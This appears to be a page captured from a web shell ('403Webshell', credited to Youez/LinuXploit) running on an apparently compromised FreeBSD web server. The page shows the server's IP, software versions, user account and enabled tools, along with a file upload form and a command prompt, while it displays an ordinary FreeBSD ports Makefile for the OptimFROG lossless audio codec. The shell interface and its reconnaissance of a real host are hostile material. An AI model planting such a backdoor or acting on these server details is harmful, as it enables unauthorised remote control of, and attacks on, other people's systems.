403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/audio/optimfrog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/audio/optimfrog/Makefile
PORTNAME=	optimfrog
PORTVERSION=	5.100
CATEGORIES=	audio
MASTER_SITES=	http://losslessaudio.org/Downloads/A1C0/${DISTVERSION:S/.//}/FreeBSD/
DISTNAME=	# OptimFROG_FreeBSD_${ARCH}_${DISTVERSION:S/.//}

MAINTAINER=	ports@FreeBSD.org
COMMENT?=	Best-ratio lossless audio codec
WWW=		http://www.losslessaudio.org/

LICENSE=	OptimFROG
LICENSE_NAME=	OptimFROG - License
LICENSE_FILE=	${WRKSRC}/license.html	#only available as html
# No fees may be collected for redistribution
LICENSE_PERMS=	dist-mirror pkg-mirror auto-accept

RUN_DEPENDS+=	${LOCALBASE}/lib/compat/libstdc++.so.6:misc/compat9x

CONFLICTS_INSTALL?=	optimfrog-sse2

ONLY_FOR_ARCHS?=	amd64 i386

USES=		tar:txz

NO_BUILD=	yes
USE_LDCONFIG=	yes

OPTIONS_DEFINE_i386=	SSE2
OPTIONS_DEFINE?=	#
SSE2_DESC=	Use SSE2 instructions instead of x87 FPU

.include <bsd.port.pre.mk>

.if ${ARCH} == "amd64"
DISTNAME=	OptimFROG_FreeBSD_x64_${DISTVERSION:S/.//}
.else # ${ARCH} == "i386"
. if ${PORT_OPTIONS:MSSE2}
DISTNAME=	OptimFROG_FreeBSD_x86_SSE2_${DISTVERSION:S/.//}
. else
DISTNAME=	OptimFROG_FreeBSD_x86_${DISTVERSION:S/.//}
. endif
.endif

do-install:
	@(cd ${WRKSRC} && ./install.sh -d "${STAGEDIR}" -p "${PREFIX}")

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit